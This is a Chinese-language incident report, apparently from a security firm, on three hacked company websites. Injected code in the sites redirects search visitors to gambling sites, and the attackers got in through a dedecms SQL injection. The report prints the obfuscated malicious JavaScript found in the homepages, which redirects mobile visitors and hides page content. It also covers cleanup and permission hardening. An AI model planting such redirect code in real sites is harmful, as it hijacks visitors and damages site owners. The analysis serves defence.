當(dāng)前位置:首頁 >  站長 >  建站經(jīng)驗 >  正文

網(wǎng)站被黑提醒該站點可能受到黑客攻擊,部分頁面已被非法篡改

 2019-01-25 14:54  來源: 用戶投稿   我來投稿 撤稿糾錯

  域名預(yù)訂/競價,好“米”不錯過

大清早的一上班收到3個網(wǎng)站客戶的QQ聯(lián)系,說是自己公司的網(wǎng)站被跳轉(zhuǎn)到了北京sai車,cai票,du博網(wǎng)站上去了,我們SINE安全公司對3個網(wǎng)站進(jìn)行了詳細(xì)的安全檢測,發(fā)現(xiàn)這3個客戶的網(wǎng)站都是同樣的癥狀,網(wǎng)站首頁文件index.php,index.html都被篡改添加了惡意的代碼。網(wǎng)站在百度的快照也被更改成了這些cai票,bo彩的內(nèi)容了,并被百度網(wǎng)址安全中心提醒您:該站點可能受到黑客攻擊,部分頁面已被非法篡改!如下圖所示:

從百度點擊網(wǎng)站進(jìn)去,會直接跳轉(zhuǎn)到bo彩,du博網(wǎng)站上去,直接輸入3個公司的網(wǎng)站地址是不會跳轉(zhuǎn)的,點擊跳轉(zhuǎn)的時候會被360攔截掉,提示如下圖:

360安全中心提醒您:未經(jīng)證實的bo彩du博網(wǎng)站,您訪問的網(wǎng)站含有未經(jīng)證實的境外bo彩或非法du博的相關(guān)內(nèi)容,可能給您造成財產(chǎn)損失,請您謹(jǐn)慎訪問。

我們SINE安全技術(shù)通過對3個客戶網(wǎng)站的代碼的安全分析,發(fā)現(xiàn)都被攻擊者上傳了網(wǎng)站木馬后門,php大馬,以及一句話木馬后門都被上傳到了客戶網(wǎng)站的根目錄下,網(wǎng)站的首頁文件都被篡改了,包括網(wǎng)站的標(biāo)題,描述,TDK都被改成了bo彩,cai票,du博的內(nèi)容,客戶說之前還原了網(wǎng)站首頁文件,過不了多久還是被篡改,被跳轉(zhuǎn),導(dǎo)致客戶網(wǎng)站在百度的權(quán)重直接降權(quán),網(wǎng)站在百度的關(guān)鍵詞排名都掉沒了,損失慘重。網(wǎng)站被反復(fù)篡改的原因根本是網(wǎng)站代碼存在漏洞,需要對網(wǎng)站漏洞進(jìn)行修復(fù),以及做好網(wǎng)站安全加固,清除木馬后門才能徹底的解決問題。

我們來看下網(wǎng)站首頁被篡改的癥狀:

title keywords deion都被篡改了,內(nèi)容都是加密的字符:

&#x5317&#x4eac賽&#x8f66pk1&#x30 P&#x4b&#x31&#x30開&#x5956&#x76f4播&#x20北京&#x8d5b車p&#x6b1&#x30開獎&#x8bb0錄-pk&#x31&#x30&#x5f00獎視頻直播

通過url解密發(fā)現(xiàn)這些內(nèi)容都是北京sai車,北京pk10,pk10北京PK開獎等cai票的網(wǎng)站關(guān)鍵詞,簡單來講就是網(wǎng)站的標(biāo)題內(nèi)容都被攻擊者改成了cai票,bo彩的標(biāo)題,利用網(wǎng)站自身在百度的權(quán)重,做他們自己的關(guān)鍵詞排名。

網(wǎng)站被跳轉(zhuǎn)的代碼也被我們SINE安全技術(shù)找了出來,如下:

function goPAGE() {if((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "rgyh2"} else {var ss = '

'; eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); try { setInterval(function() { try { document.getElementById("div" + "All").style.display = "no" + "ne" } catch (e) {} for (var i = 0; i < document.body.children.length; i++) { try { var tagname = document.body.children[i].tagName; var myid = document.body.children[i].id;if (myid != "iconDiv1" && myid != "yangchen") {document.body.children[i].style.display = "non" + "e" } } catch (e) {} } }, 100)} catch (e) {}}}goPAGE();

知道問題的所在,以及網(wǎng)站被攻擊的癥狀,那么該如何解決問題?

首先登陸客戶網(wǎng)站的服務(wù)器,打包壓縮客戶的網(wǎng)站代碼下載到我們本地的工作電腦,對其進(jìn)行詳細(xì)的安全檢測,以及網(wǎng)站漏洞檢測,網(wǎng)站木馬后門檢測,以及網(wǎng)站日志下載分析,發(fā)現(xiàn)其中一個網(wǎng)站使用的是dedecms系統(tǒng)開發(fā)網(wǎng)站,網(wǎng)站存在sql注入漏洞,導(dǎo)致網(wǎng)站的管理員賬號密碼被sql注入獲取到,默認(rèn)的管理員后臺地址dede沒有改,導(dǎo)致攻擊者直接登錄后臺上傳了木馬到網(wǎng)站里了。針對dedecms的sql注入漏洞進(jìn)行了修復(fù),清除掉網(wǎng)站存在的木馬后門,對網(wǎng)站安全進(jìn)行加固問題得以解決。

對dedecms的目錄安全權(quán)限進(jìn)行設(shè)置 /data目錄取消腳本執(zhí)行權(quán)限,給與寫入權(quán)限,templets模板文件夾也是同樣的安全部署,取消php腳本的執(zhí)行權(quán)限,開啟寫入權(quán)限,dede后臺的目錄給只讀權(quán)限,uploads上傳目錄給寫入,取消php腳本權(quán)限。

至此客戶網(wǎng)站首頁被篡改的問題得以解決,百度的攔截也是需要去除的,清除惡意鏈接代碼,修復(fù)網(wǎng)站漏洞,防止以后網(wǎng)站被篡改,做好網(wǎng)站安全后,再提交給百度安全中心人工審核,就可以解除百度的攔截,如果您對網(wǎng)站漏洞修復(fù)不熟悉的話,可以找我們SINE安全來修復(fù)網(wǎng)站漏洞,解決百度攔截。本文來源:www.sinesafe.com

申請創(chuàng)業(yè)報道,分享創(chuàng)業(yè)好點子。點擊此處,共同探討創(chuàng)業(yè)新機(jī)遇!

相關(guān)文章

熱門排行

信息推薦